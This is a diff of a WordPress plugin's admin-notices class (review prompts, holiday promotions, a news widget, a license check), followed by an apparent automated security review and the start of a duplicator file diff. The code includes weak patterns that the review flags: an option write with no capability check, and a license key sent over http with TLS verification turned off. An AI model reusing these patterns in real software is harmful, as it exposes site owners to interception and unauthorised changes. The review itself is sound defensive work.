-		if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
-			return false;
-		}
-
-		$body = wp_remote_retrieve_body( $response );
-
-		$body = json_decode( $body, true );
-
-		if ( isset( $body['license'] ) && 'valid' === $body['license'] ) {
-			$status = true;
-		}
-
-		return $status;
-	}
-
-	/**
-	 * Get PA Stories
-	 *
-	 * Gets a list of the latest three blog posts
-	 *
-	 * @since 4.10.64
-	 *
-	 * @access public
-	 */
-	public function get_pa_stories() {
-
-		$stories = get_transient( 'pa_stories_' . PREMIUM_ADDONS_VERSION );
-
-		if ( ! $stories ) {
-
-			$api_url = 'https://premiumaddons.com/wp-json/stories/v2/get';
-
-			$response = wp_remote_get(
-				$api_url,
-				array(
-					'timeout'   => 15,
-					'sslverify' => true,
-				)
-			);
-
-			if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
-				set_transient( 'pa_stories_' . PREMIUM_ADDONS_VERSION, true, WEEK_IN_SECONDS );
-				return false;
-			}
-
-			$body    = wp_remote_retrieve_body( $response );
-			$stories = json_decode( $body, true );
-
-			set_transient( 'pa_stories_' . PREMIUM_ADDONS_VERSION, $stories, WEEK_IN_SECONDS );
-
-		}
-
-		$this->stories = $stories;
-
-		return $stories;
-	}
-
-	public function show_story_widget() {
-
-		$stories = $this->get_pa_stories();
-
-		if ( ! is_array( $stories ) || empty( $stories ) ) {
-			return;
-		}
-
-		wp_add_dashboard_widget(
-			'pa-stories',
-			__( 'Premium Addons News', 'premium-addons-for-elementor' ),
-			array( $this, 'show' ),
-			null,
-			null,
-			'column3',
-			'core'
-		);
-	}
-
-
-	public function show() {
-
-		$stories = $this->stories;
-
-		$time = time();
-
-		$papro_path = 'premium-addons-pro/premium-addons-pro-for-elementor.php';
-
-		$license_data = get_transient( 'pa_license_info' );
-		$highlight = false;
-
-		if( isset( $license_data['status'] ) && 'valid' === $license_data['status'] ) {
-
-			if( isset( $license_data['id'] ) && '4' !== $license_data['id'] ) {
-
-				$highlight = true;
-				array_unshift( $stories['posts'], array(
-					'title' => 'Switch to Premium Addons Pro Lifetime, Pay the Difference & Save 30% Today!',
-					'link'  => Helper_Functions::get_campaign_link( 'https://premiumaddons.com/docs/upgrade-premium-addons-license/', 'wp-dash', 'xmas25-dash-widget', 'xmas25' ),
-				) );
-
-			}
-
-		}
-
-
-		?>
-			<style>
-				.pa-banners-grid {
-					margin-bottom: 10px;
-				}
-
-				.pa-stories-banner {
-					position: relative;
-				}
-
-				.pa-stories-banner a {
-					position: absolute;
-					inset: 0;
-				}
-
-				.pa-story-img-container img {
-					width: 100%;
-					display: block;
-				}
-
-				.pa-news-post {
-					margin-bottom: 5px;
-				}
-
-				.pa-news-post a {
-					font-weight: 500;
-					color: #0073aa;
-					text-decoration: none;
-					padding-bottom: 5px;
-					display: inline-block;
-				}
-
-				.pa-dashboard-widget-block {
-					width: 100%;
-				}
-
-				.pa-footer-bar {
-					border-top: 1px solid #eee;
-					padding-top: 1rem;
-					display: flex;
-					justify-content: space-between;
-				}
-
-				.pa-dashboard-widget-block a {
-					text-decoration: none;
-					font-size: 13px;
-					color: #007cba;
-				}
-
-				.pa-dashboard-widget-block .dashicons {
-					vertical-align: middle;
-					font-size: 17px;
-				}
-			</style>
-
-
-			<div class="pa-banners-grid">
-
-				<?php foreach ( $stories['banners'] as $index => $banner ) : ?>
-
-					<?php if ( isset( $banner['end'] ) && $time < $banner['end'] ) : ?>
-
-						<div class="pa-stories-banner">
-							<div class="pa-story-img-container">
-								<img src="<?php echo esc_url( $banner['image'] ); ?>" alt="<?php echo esc_attr( $banner['description'] ); ?>">
-							</div>
-							<a href="<?php echo esc_url( Helper_Functions::get_campaign_link( $banner['link'], 'wp-dash', 'dash-widget', 'xmas25' ) ); ?>" target="_blank" title="<?php echo esc_attr( $banner['description'] ); ?>"></a>
-						</div>
-
-					<?php endif; ?>
-
-				<?php endforeach; ?>
-
-			</div>
-
-
-			<div class="pa-posts-grid">
-
-				<?php foreach ( $stories['posts'] as $index => $post ) : ?>
-
-					<div class="pa-news-post">
-						<a style="<?php echo 0 === $index && $highlight ? 'color: #93003f' : '' ?>" target="_blank" href="<?php echo esc_url( $post['link'] ); ?>">
-							<?php echo wp_kses_post( $post['title'] ); ?>
-						</a>
-					</div>
-
-				<?php endforeach; ?>
-
-			</div>
-
-			<div class="pa-dashboard-widget-block">
-				<div class="pa-footer-bar">
-					<a href="https://wordpress.org/support/plugin/premium-addons-for-elementor/" target="_blank" style="color: #27ae60">
-						Need Help?
-						<span aria-hidden="true" class="dashicons dashicons-external"></span>
-					</a>
-					<a href="https://www.youtube.com/leap13" target="_blank" style="color: #e1002d">
-						YouTube Channel
-						<span aria-hidden="true" class="dashicons dashicons-youtube"></span>
-					</a>
-					<a href="https://www.facebook.com/groups/PremiumAddons" target="_blank" style="color: #1877F2;">
-						Facebook Community
-						<span aria-hidden="true" class="dashicons dashicons-facebook-alt"></span>
-					</a>
-				</div>
-			</div>
-
-		<?php
-	}
-
-	/**
-	 * Creates and returns an instance of the class
-	 *
-	 * @since 2.8.4
-	 * @access public
-	 *
-	 * @return object
-	 */
-	public static function get_instance() {
-
-		if ( ! isset( self::$instance ) ) {
-
-			self::$instance = new self();
-
-		}
-
-		return self::$instance;
-	}
-}
+<?php
+/**
+ * PA Admin Notices.
+ */
+
+namespace PremiumAddonsAdminIncludes;
+
+use PremiumAddonsIncludesHelper_Functions;
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit();
+}
+
+/**
+ * Class Admin_Notices
+ */
+class Admin_Notices {
+
+	/**
+	 * Premium Addons Stories
+	 *
+	 * @var stories
+	 */
+	private $stories = array();
+
+	/**
+	 * Class object
+	 *
+	 * @var instance
+	 */
+	private static $instance = null;
+
+	/**
+	 * Elementor slug
+	 *
+	 * @var elementor
+	 */
+	private static $elementor = 'elementor';
+
+	/**
+	 * PAPRO Slug
+	 *
+	 * @var papro
+	 */
+	private static $papro = 'premium-addons-pro';
+
+	/**
+	 * Notices Keys
+	 *
+	 * @var notices
+	 */
+	private static $notices = null;
+
+	/**
+	 * Constructor for the class
+	 */
+	public function __construct() {
+
+		add_action( 'admin_init', array( $this, 'init' ) );
+
+		add_action( 'admin_notices', array( $this, 'admin_notices' ) );
+
+		add_action( 'admin_enqueue_scripts', array( $this, 'admin_enqueue_scripts' ) );
+
+		add_action( 'wp_ajax_pa_reset_admin_notice', array( $this, 'reset_admin_notice' ) );
+
+		add_action( 'wp_ajax_pa_dismiss_admin_notice', array( $this, 'dismiss_admin_notice' ) );
+
+		self::$notices = array(
+			'pa-review',
+			'bf25-last-not',
+		);
+
+		if ( Helper_Functions::check_hide_notifications() ) {
+			return;
+		}
+
+		add_action( 'wp_dashboard_setup', array( $this, 'show_story_widget' ), 111 );
+	}
+
+	/**
+	 * Init
+	 *
+	 * Init required functions
+	 *
+	 * The redirection happens on the first admin page after activation ( the plugins page ).
+	 *
+	 * @since 1.0.0
+	 * @access public
+	 */
+	public function init() {
+
+		$this->handle_review_notice();
+
+		if ( Helper_Functions::check_elementor_version() && get_transient( 'pa_activation_redirect' ) ) {
+
+			delete_transient( 'pa_activation_redirect' );
+
+			$redirect = add_query_arg(
+				array(
+					'page' => 'pa-setup-wizard', // this mean it should've been added first.
+				),
+				admin_url( 'admin.php' )
+			);
+
+			wp_safe_redirect( $redirect );
+
+			exit;
+		}
+	}
+
+	/**
+	 * Init notices check functions.
+	 */
+	public function admin_notices() {
+
+		// Skip rendering notices during AJAX requests.
+		if ( wp_doing_ajax() ) {
+			return;
+		}
+
+		$this->required_plugins_check();
+
+		// Make sure "Already did" was not clicked before.
+		$show_review = get_option( 'pa_review_notice' );
+		if ( '1' !== $show_review ) {
+
+			$cache_key = 'pa_review_notice';
+
+			$response = get_transient( $cache_key );
+
+			if ( false == $response ) {
+				$this->show_review_notice();
+			}
+		}
+
+		if ( Helper_Functions::check_hide_notifications() ) {
+			return;
+		}
+
+		// $this->get_black_friday_notice();
+	}
+
+	/**
+	 * Handle Review Notice
+	 *
+	 * Checks if review message is dismissed.
+	 *
+	 * @access public
+	 * @return void
+	 */
+	public function handle_review_notice() {
+
+		if ( ! isset( $_GET['pa_review'] ) ) {
+			return;
+		}
+
+		if ( 'opt_out' === $_GET['pa_review'] ) {
+			check_admin_referer( 'opt_out' );
+
+			update_option( 'pa_review_notice', '1' );
+		}
+
+		wp_safe_redirect( remove_query_arg( 'pa_review' ) );
+
+		exit;
+	}
+
+	/**
+	 * Required plugin check
+	 *
+	 * Shows an admin notice when Elementor is missing.
+	 *
+	 * @since 1.0.0
+	 * @access public
+	 */
+	public function required_plugins_check() {
+
+		// Early return if Elementor is already active.
+		if ( Helper_Functions::check_elementor_version() ) {
+			return;
+		}
+
+		$elementor_path = sprintf( '%1$s/%1$s.php', self::$elementor );
+
+		$message = '';
+
+		if ( ! Helper_Functions::is_plugin_installed( $elementor_path ) ) {
+
+			if ( ! Admin_Helper::check_user_can( 'install_plugins' ) ) {
+				return;
+			}
+
+			$install_url = wp_nonce_url( self_admin_url( sprintf( 'update.php?action=install-plugin&plugin=%s', self::$elementor ) ), 'install-plugin_elementor' );
+
+			$message = sprintf( '<p>%s</p>', __( 'Premium Addons for Elementor is not working because you need to Install Elementor plugin.', 'premium-addons-for-elementor' ) );
+
+			$message .= sprintf( '<p><a href="%s" class="button-primary">%s</a></p>', $install_url, __( 'Install Now', 'premium-addons-for-elementor' ) );
+
+		} elseif ( Admin_Helper::check_user_can( 'activate_plugins' ) ) {
+
+			$activation_url = wp_nonce_url( 'plugins.php?action=activate&plugin=' . $elementor_path . '&plugin_status=all&paged=1&s', 'activate-plugin_' . $elementor_path );
+
+			$message = '<p>' . __( 'Premium Addons for Elementor is not working because you need to activate Elementor plugin.', 'premium-addons-for-elementor' ) . '</p>';
+
+			$message .= '<p>' . sprintf( '<a href="%s" class="button-primary">%s</a>', $activation_url, __( 'Activate Now', 'premium-addons-for-elementor' ) ) . '</p>';
+		} else {
+			return;
+		}
+
+		if ( ! empty( $message ) ) {
+			$this->render_admin_notices( $message );
+		}
+	}
+
+	/**
+	 * Get Review Text
+	 *
+	 * Gets admin review notice HTML.
+	 *
+	 * @since 2.8.4
+	 * @access public
+	 *
+	 * @param string $review_url plugin page.
+	 * @param string $optout_url redirect url.
+	 */
+	public function get_review_text( $review_url, $optout_url ) {
+
+		$notice = sprintf(
+			'<p>' . __( 'Could we take just 2 minutes of your time? We'd be incredibly grateful if you could give ', 'premium-addons-for-elementor' ) .
+			'<b>' . __( 'Premium Addons for Elementor', 'premium-addons-for-elementor' ) . '</b> a 5 Stars Rating on WordPress.org. Your support helps us continue creating even more amazing free features in the future!</p>
+            <div>
+                <a class="button pa-review-btn button-primary" href="%s" target="_blank"><span>' . __( 'Sure, leave a Review', 'premium-addons-for-elementor' ) . '</span></a>
+                <a class="button" href="%2$s"><span>' . __( 'I Already Did', 'premium-addons-for-elementor' ) . '</span></a>
+                <a class="button button-secondary pa-notice-reset"><span>' . __( 'Maybe Later', 'premium-addons-for-elementor' ) . '</span></a>
+            </div>',
+			$review_url,
+			$optout_url
+		);
+
+		return $notice;
+	}
+
+	/**
+	 * Checks if review admin notice is dismissed
+	 *
+	 * @since 2.6.8
+	 * @return void
+	 */
+	public function show_review_notice() {
+
+		$review_url = 'https://wordpress.org/support/plugin/premium-addons-for-elementor/reviews/#new-post';
+
+		$optout_url = wp_nonce_url( add_query_arg( 'pa_review', 'opt_out' ), 'opt_out' );
+		?>
+
+		<div class="error pa-notice-wrap pa-review-notice" data-notice="pa-review">
+			<div class="pa-img-wrap">
+				<img src="<?php echo esc_url( PREMIUM_ADDONS_URL . 'admin/images/pa-logo-symbol.png' ); ?>">
+			</div>
+			<div class="pa-text-wrap">
+				<?php echo wp_kses_post( $this->get_review_text( $review_url, $optout_url ) ); ?>
+			</div>
+			<div class="pa-notice-close">
+				<a href="<?php echo esc_url( $optout_url ); ?>"><span class="dashicons dashicons-dismiss"></span></a>
+			</div>
+		</div>
+
+		<?php
+	}
+
+	public function get_black_friday_notice() {
+
+		$time = time();
+
+		if ( $time > 1765497600 || '1' === get_option( 'bf25-last-not' ) ) {
+			return;
+		}
+
+		$is_papro_active = Helper_Functions::check_papro_version();
+
+		$license_key = get_option( 'papro_license_key' );
+
+		$link = Helper_Functions::get_campaign_link( 'https://premiumaddons.com/black-friday/#bfdeals', 'wp-dash', 'bf25-notification', 'cm25' );
+
+		$promotion_type = 'new';
+
+		if ( $is_papro_active ) {
+
+			$license_data = get_transient( 'pa_license_info' );
+
+			if ( isset( $license_data['status'] ) && 'valid' === $license_data['status'] ) {
+
+				if ( isset( $license_data['id'] ) && '4' === $license_data['id'] ) {
+					return;
+				} else {
+
+					$promotion_type = 'upgrade';
+
+					$link = Helper_Functions::get_campaign_link( 'https://premiumaddons.com/docs/upgrade-premium-addons-license/', 'wp-dash', 'bf25-notification', 'cm25' );
+				}
+			}
+		}
+
+		$message = $this->get_promotion_message( $promotion_type );
+
+		?>
+
+		<div class="error pa-notice-wrap pa-new-feature-notice pa-review-notice">
+			<div class="pa-img-wrap">
+				<img src="<?php echo PREMIUM_ADDONS_URL . 'admin/images/pa-logo-symbol.png'; ?>">
+			</div>
+			<div class="pa-text-wrap">
+				<p>
+					<?php echo wp_kses_post( $message['message'] ); ?>
+					<a class="button pa-cta-btn button-primary" href="<?php echo esc_url( $link ); ?>" target="_blank">
+						<span><?php echo wp_kses_post( $message['cta'] ); ?></span>
+					</a>
+				</p>
+			</div>
+			<div class="pa-notice-close" data-notice="bf25-last-not">
+				<span class="dashicons dashicons-dismiss"></span>
+			</div>
+		</div>
+
+		<?php
+	}
+
+	/**
+	 * Get Promotion Message
+	 *
+	 * @since 4.11.43
+	 * @access private
+	 *
+	 * @param string $type promotion type.
+	 * @return array
+	 */
+	private function get_promotion_message( $type = 'new' ) {
+
+		if ( 'upgrade' === $type ) {
+			return array(
+				'message' => __( 'Get a <b>FLAT 35% OFF</b> when you upgrade to <b>Premium Addons Pro Lifetime</b>. Use code <b>BFUL2025</b> at checkout – <b>expires soon!</b>', 'premium-addons-for-elementor' ),
+				'cta'     => __( 'Upgrade Now', 'premium-addons-for-elementor' ),
+			);
+
+		}
+
+		return array(
+			'message' => __( '<b>Cyber Monday – Save Up To $105 on Premium Addons Pro</b>.', 'premium-addons-for-elementor' ),
+			'cta'     => __( 'Catch The Deal', 'premium-addons-for-elementor' ),
+		);
+	}
+
+	/**
+	 * Renders an admin notice error message
+	 *
+	 * @since 1.0.0
+	 * @access private
+	 *
+	 * @param string $message notice text.
+	 * @param string $class notice class.
+	 * @param string $handle notice handle.
+	 *
+	 * @return void
+	 */
+	private function render_admin_notices( $message, $class = '', $handle = '' ) {
+		?>
+			<div class="error pa-new-feature-notice <?php echo esc_attr( $class ); ?>" data-notice="<?php echo esc_attr( $handle ); ?>">
+				<?php echo wp_kses_post( $message ); ?>
+			</div>
+		<?php
+	}
+
+
+
+	/**
+	 * Register admin scripts
+	 *
+	 * @since 3.2.8
+	 * @access public
+	 */
+	public function admin_enqueue_scripts() {
+
+		// Skip loading scripts during AJAX or REST requests.
+		if ( wp_doing_ajax() || ( defined( 'REST_REQUEST' ) && REST_REQUEST ) ) {
+			return;
+		}
+
+		wp_enqueue_script(
+			'pa-dashboard',
+			PREMIUM_ADDONS_URL . 'admin/assets/js/pa-dashboard.js',
+			array( 'jquery' ),
+			PREMIUM_ADDONS_VERSION,
+			true
+		);
+
+		wp_localize_script(
+			'pa-dashboard',
+			'PaNoticeSettings',
+			array(
+				'ajaxurl' => esc_url( admin_url( 'admin-ajax.php' ) ),
+				'nonce'   => wp_create_nonce( 'pa-notice-nonce' ),
+			)
+		);
+	}
+
+	/**
+	 * Set transient for admin notice
+	 *
+	 * @since 3.2.8
+	 * @access public
+	 *
+	 * @return void
+	 */
+	public function reset_admin_notice() {
+
+		check_ajax_referer( 'pa-notice-nonce', 'nonce' );
+
+		if ( ! Admin_Helper::check_user_can( 'manage_options' ) ) {
+			wp_send_json_error();
+		}
+
+		$key = isset( $_POST['notice'] ) ? sanitize_text_field( wp_unslash( $_POST['notice'] ) ) : '';
+
+		if ( ! empty( $key ) && in_array( $key, self::$notices, true ) ) {
+
+			$cache_key = 'pa_review_notice';
+
+			set_transient( $cache_key, true, WEEK_IN_SECONDS );
+
+			wp_send_json_success();
+
+		} else {
+
+			wp_send_json_error();
+
+		}
+	}
+
+	/**
+	 * Dismiss admin notice
+	 *
+	 * @since 3.11.7
+	 * @access public
+	 *
+	 * @return void
+	 */
+	public function dismiss_admin_notice() {
+
+		check_ajax_referer( 'pa-notice-nonce', 'nonce' );
+
+		if ( ! current_user_can( 'manage_options' ) ) {
+			wp_send_json_error();
+		}
+
+		$key = isset( $_POST['notice'] ) ? sanitize_text_field( wp_unslash( $_POST['notice'] ) ) : '';
+
+		if ( ! empty( $key ) && in_array( $key, self::$notices, true ) ) {
+
+			// Make sure new features notices will not appear again.
+			if ( false != strpos( $key, 'not' ) ) {
+				update_option( $key, '1' );
+			} else {
+				set_transient( $key, true, 20 * DAY_IN_SECONDS );
+
+			}
+
+			wp_send_json_success();
+
+		} else {
+
+			wp_send_json_error();
+
+		}
+	}
+
+	/**
+	 * Check Status
+	 *
+	 * @since 4.10.15
+	 * @access public
+	 */
+	public function check_status( $key ) {
+
+		$status = false;
+
+		$api_params = array(
+			'edd_action' => 'check_license',
+			'license'    => $key,
+			'item_id'    => 361,
+		);
+
+		$response = wp_remote_get(
+			'http://my.leap13.com',
+			array(
+				'timeout'   => 15,
+				'sslverify' => false,
+				'body'      => $api_params,
+			)
+		);
+
+		if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
+			return false;
+		}
+
+		$body = wp_remote_retrieve_body( $response );
+
+		$body = json_decode( $body, true );
+
+		if ( isset( $body['license'] ) && 'valid' === $body['license'] ) {
+			$status = true;
+		}
+
+		return $status;
+	}
+
+	/**
+	 * Get PA Stories
+	 *
+	 * Gets a list of the latest three blog posts
+	 *
+	 * @since 4.10.64
+	 *
+	 * @access public
+	 */
+	public function get_pa_stories() {
+
+		$stories = get_transient( 'pa_stories_' . PREMIUM_ADDONS_VERSION );
+
+		if ( ! $stories ) {
+
+			$api_url = 'https://premiumaddons.com/wp-json/stories/v2/get';
+
+			$response = wp_remote_get(
+				$api_url,
+				array(
+					'timeout'   => 15,
+					'sslverify' => true,
+				)
+			);
+
+			if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
+				set_transient( 'pa_stories_' . PREMIUM_ADDONS_VERSION, true, WEEK_IN_SECONDS );
+				return false;
+			}
+
+			$body    = wp_remote_retrieve_body( $response );
+			$stories = json_decode( $body, true );
+
+			set_transient( 'pa_stories_' . PREMIUM_ADDONS_VERSION, $stories, WEEK_IN_SECONDS );
+
+		}
+
+		$this->stories = $stories;
+
+		return $stories;
+	}
+
+	public function show_story_widget() {
+
+		$stories = $this->get_pa_stories();
+
+		if ( ! is_array( $stories ) || empty( $stories ) ) {
+			return;
+		}
+
+		wp_add_dashboard_widget(
+			'pa-stories',
+			__( 'Premium Addons News', 'premium-addons-for-elementor' ),
+			array( $this, 'show' ),
+			null,
+			null,
+			'column3',
+			'core'
+		);
+	}
+
+
+	public function show() {
+
+		$stories = $this->stories;
+
+		$time = time();
+
+		$papro_path = 'premium-addons-pro/premium-addons-pro-for-elementor.php';
+
+		$license_data = get_transient( 'pa_license_info' );
+		$highlight    = false;
+
+		if ( isset( $license_data['status'] ) && 'valid' === $license_data['status'] ) {
+
+			if ( isset( $license_data['id'] ) && '4' !== $license_data['id'] ) {
+
+				$highlight = true;
+				array_unshift(
+					$stories['posts'],
+					array(
+						'title' => 'Switch to Premium Addons Pro Lifetime, Pay the Difference & Save 30% Today!',
+						'link'  => Helper_Functions::get_campaign_link( 'https://premiumaddons.com/docs/upgrade-premium-addons-license/', 'wp-dash', 'xmas25-dash-widget', 'xmas25' ),
+					)
+				);
+
+			}
+		}
+
+		?>
+			<style>
+				.pa-banners-grid {
+					margin-bottom: 10px;
+				}
+
+				.pa-stories-banner {
+					position: relative;
+				}
+
+				.pa-stories-banner a {
+					position: absolute;
+					inset: 0;
+				}
+
+				.pa-story-img-container img {
+					width: 100%;
+					display: block;
+				}
+
+				.pa-news-post {
+					margin-bottom: 5px;
+				}
+
+				.pa-news-post a {
+					font-weight: 500;
+					color: #0073aa;
+					text-decoration: none;
+					padding-bottom: 5px;
+					display: inline-block;
+				}
+
+				.pa-dashboard-widget-block {
+					width: 100%;
+				}
+
+				.pa-footer-bar {
+					border-top: 1px solid #eee;
+					padding-top: 1rem;
+					display: flex;
+					justify-content: space-between;
+				}
+
+				.pa-dashboard-widget-block a {
+					text-decoration: none;
+					font-size: 13px;
+					color: #007cba;
+				}
+
+				.pa-dashboard-widget-block .dashicons {
+					vertical-align: middle;
+					font-size: 17px;
+				}
+			</style>
+
+
+			<div class="pa-banners-grid">
+
+				<?php foreach ( $stories['banners'] as $index => $banner ) : ?>
+
+					<?php if ( isset( $banner['end'] ) && $time < $banner['end'] ) : ?>
+
+						<div class="pa-stories-banner">
+							<div class="pa-story-img-container">
+								<img src="<?php echo esc_url( $banner['image'] ); ?>" alt="<?php echo esc_attr( $banner['description'] ); ?>">
+							</div>
+							<a href="<?php echo esc_url( Helper_Functions::get_campaign_link( $banner['link'], 'wp-dash', 'dash-widget', 'xmas25' ) ); ?>" target="_blank" title="<?php echo esc_attr( $banner['description'] ); ?>"></a>
+						</div>
+
+					<?php endif; ?>
+
+				<?php endforeach; ?>
+
+			</div>
+
+
+			<div class="pa-posts-grid">
+
+				<?php foreach ( $stories['posts'] as $index => $post ) : ?>
+
+					<div class="pa-news-post">
+						<a style="<?php echo 0 === $index && $highlight ? 'color: #93003f' : ''; ?>" target="_blank" href="<?php echo esc_url( $post['link'] ); ?>">
+							<?php echo wp_kses_post( $post['title'] ); ?>
+						</a>
+					</div>
+
+				<?php endforeach; ?>
+
+			</div>
+
+			<div class="pa-dashboard-widget-block">
+				<div class="pa-footer-bar">
+					<a href="https://wordpress.org/support/plugin/premium-addons-for-elementor/" target="_blank" style="color: #27ae60">
+						Need Help?
+						<span aria-hidden="true" class="dashicons dashicons-external"></span>
+					</a>
+					<a href="https://www.youtube.com/leap13" target="_blank" style="color: #e1002d">
+						YouTube Channel
+						<span aria-hidden="true" class="dashicons dashicons-youtube"></span>
+					</a>
+					<a href="https://www.facebook.com/groups/PremiumAddons" target="_blank" style="color: #1877F2;">
+						Facebook Community
+						<span aria-hidden="true" class="dashicons dashicons-facebook-alt"></span>
+					</a>
+				</div>
+			</div>
+
+		<?php
+	}
+
+	/**
+	 * Creates and returns an instance of the class
+	 *
+	 * @since 2.8.4
+	 * @access public
+	 *
+	 * @return object
+	 */
+	public static function get_instance() {
+
+		if ( ! isset( self::$instance ) ) {
+
+			self::$instance = new self();
+
+		}
+
+		return self::$instance;
+	}
+}
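Review bot: handle_review_notice() runs on admin_init and calls update_option( 'pa_review_notice', '1' ) after check_admin_referer( 'opt_out' ) only, with no capability check, while reset_admin_notice() and dismiss_admin_notice() in the same class both gate on manage_options. The 'opt_out' nonce is printed by show_review_notice(), which is not capability-gated in the lines shown, so the option write is reachable by any account that is shown the notice; the effect is limited to hiding the review notice, but it is the same missing-check pattern this advisory is about. Suggest adding `if ( ! current_user_can( 'manage_options' ) ) { return; }` before the update, and using one helper consistently (reset_admin_notice() calls Admin_Helper::check_user_can(), dismiss_admin_notice() calls current_user_can()). Separately, check_status() sends the license key to http://my.leap13.com with 'sslverify' => false, whereas get_pa_stories() already uses https with 'sslverify' => true; check_status() should match it. get_black_friday_notice() also echoes the logo URL without esc_url(), unlike show_review_notice().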
--- a/premium-addons-for-elementor/admin/includes/duplicator.php
+++ b/premium-addons-for-elementor/admin/includes/duplicator.php
@@ -1,271 +1,271 @@
-<?php
-/**
- * PA Duplicator.
- */
-
-namespace PremiumAddonsAdminIncludes;
-
-use ElementorCoreFilesCSSPost as Post_CSS;
-
-if ( ! defined( 'ABSPATH' ) ) {
-	exit();
-}
-
-/**
- * Class Duplicator
- */
-class Duplicator {
-
-	/**
-	 * PA Duplicator action.
-	 */
-	const DUPLICATE_ACTION = 'pa_duplicator';
-
-	/**
-	 * Class object
-	 *
-	 * @var instance
-	 */
-	private static $instance = null;
-
-	/**
-	 * Constructor for the class
-	 */
-	public function __construct() {
-
-		add_action( 'admin_action_' . self::DUPLICATE_ACTION, array( $this, 'duplicate_post' ) );
-
-		add_filter( 'post_row_actions', array( $this, 'add_duplicator_actions' ), 10, 2 );
-
-		add_filter( 'page_row_actions', array( $this, 'add_duplicator_actions' ), 10, 2 );
-	}
-
-	/**
-	 * Add Duplicator Actions
-	 *
-	 * Add duplicator action links to posts/pages
-	 *
-	 * @access public
-	 * @since 3.9.7
-	 *
-	 * @param array  $actions row actions.
-	 * @param object $post WP_Post.
-	 * @return array
-	 */
-	public function add_duplicator_actions( $actions, $post ) {
-
-		if ( current_user_can( 'edit_others_posts' ) && post_type_supports( $post->post_type, 'elementor' ) ) {
-
-			$actions[ self::DUPLICATE_ACTION ] = sprintf(
-				'<a href="%1$s" title="%2$s"><span class="screen-reader-text">%2$s</span>%3$s</a>',
-				esc_url( self::get_duplicate_url( $post->ID ) ),
-				/* translators: %s: Post Title */
-				sprintf( esc_attr__( 'Duplicate - %s', 'premium-addons-for-elementor' ), esc_attr( $post->post_title ) ),
-				__( 'PA Duplicate', 'premium-addons-for-elementor' )
-			);
-
-		}
-
-		return $actions;
-	}
-
-	/**
-	 * Get duplicate url
-	 *
-	 * @access public
-	 * @since 3.9.7
-	 *
-	 * @param integer $post_id item ID.
-	 * @return string
-	 */
-	public static function get_duplicate_url( $post_id ) {
-
-		$paged = ( get_query_var( 'paged' ) ) ? get_query_var( 'paged' ) : 1;
-
-		return wp_nonce_url(
-			add_query_arg(
-				array(
-					'action'  => self::DUPLICATE_ACTION,
-					'post_id' => $post_id,
-					'paged'   => $paged,
-				),
-				admin_url( 'admin.php' )
-			),
-			self::DUPLICATE_ACTION
-		);
-	}
-
-	/**
-	 * Duplicate required post/page
-	 *
-	 * @access public
-	 * @since 3.9.7
-	 *
-	 * @return void
-	 */
-	public function duplicate_post() {
-
-		$nonce   = isset( $_GET['_wpnonce'] ) ? sanitize_text_field( wp_unslash( $_GET['_wpnonce'] ) ) : '';
-		$post_id = isset( $_GET['post_id'] ) ? absint( $_GET['post_id'] ) : 0;
-		$paged   = isset( $_GET['paged'] ) ? absint( $_GET['paged'] ) : 1;
-
-		if ( ! current_user_can( 'edit_post', $post_id ) ) {
-			return;
-		}
-
-		if ( ! wp_verify_nonce( $nonce, self::DUPLICATE_ACTION ) ) {
-			return;
-		}
-
-		$post = get_post( $post_id );
-		if ( is_null( $post ) ) {
-			return;
-		}
-
-		$post = sanitize_post( $post, 'db' );
-
-		$duplicated_post_id = self::insert_post( $post );
-
-		$redirect = add_query_arg(
-			array(
-				'post_type' => $post->post_type,
-				'paged'     => $paged,
-			),
-			admin_url( 'edit.php' )
-		);
-
-		if ( ! is_wp_error( $duplicated_post_id ) ) {
-
-			self::duplicate_post_taxonomies( $post, $duplicated_post_id );
-			self::duplicate_post_meta_data( $post_id, $duplicated_post_id );
-
-			$css = Post_CSS::create( $duplicated_post_id );
-			$css->update();
-
-		}
-
-		wp_safe_redirect( $redirect );
-		die();
-	}
-
-	/**
-	 * Duplicate required post/page
-	 *
-	 * @access public
-	 * @since 3.9.7
-	 *
-	 * @param object $post WP_Post.
-	 */
-	protected static function insert_post( $post ) {
-
-		$current_user = wp_get_current_user();
-
-		$post_meta = get_post_meta( $post->ID );
-
-		$duplicated_post_args = array(
-			'post_status'    => 'draft',
-			'post_type'      => $post->post_type,
-			'post_parent'    => $post->post_parent,
-			'post_content'   => $post->post_content,
-			'menu_order'     => $post->menu_order,
-			'ping_status'    => $post->ping_status,
-			'post_excerpt'   => $post->post_excerpt,
-			'post_password'  => $post->post_password,
-			'comment_status' => $post->comment_status,
-			'to_ping'        => $post->to_ping,
-			'post_author'    => $current_user->ID,
-			'post_title'     => sprintf(
-				/* translators: 1: Post Title, 2: Post ID */
-				__( '%1$s - Duplicate - [#%2$d]', 'premium-addons-for-elementor' ),
-				$post->post_title,
-				$post->ID
-			),
-		);
-
-		if ( isset( $post_meta['_elementor_edit_mode'][0] ) ) {
-
-			$data = array(
-				'meta_input' => array(
-					'_elementor_edit_mode'     => $post_meta['_elementor_edit_mode'][0],
-					'_elementor_template_type' => $post_meta['_elementor_template_type'][0],
-				),
-			);
-
-			$duplicated_post_args = array_merge( $duplicated_post_args, $data );
-
-		}
-
-		return wp_insert_post( $duplicated_post_args );
-	}
-
-	/**
-	 * Add post taxonomies to the cloned version
-	 *
-	 * @access public
-	 * @since 3.9.7
-	 *
-	 * @param object  $post WP_Post.
-	 * @param integer $id item ID.
-	 */
-	public static function duplicate_post_taxonomies( $post, $id ) {
-
-		$taxonomies = array_map( 'sanitize_text_field', get_object_taxonomies( $post->post_type ) );
-
-		if ( ! empty( $taxonomies ) && is_array( $taxonomies ) ) {
-			foreach ( $taxonomies as $taxonomy ) {
-				$terms = wp_get_object_terms( $post->ID, $taxonomy, array( 'fields' => 'slugs' ) );
-				wp_set_object_terms( $id, $terms, $taxonomy, false );
-			}
-		}
-	}
-
-	/**
-	 * Add post meta data to the cloned version
-	 *
-	 * @access public
-	 * @since 3.9.7
-	 *
-	 * @param object  $post WP_Post.
-	 * @param integer $id item ID.
-	 */
-	public static function duplicate_post_meta_data( $old_id, $new_id ) {
-
-		$post_meta_keys = get_post_custom_keys( $old_id );
-
-		if ( ! empty( $post_meta_keys ) ) {
-
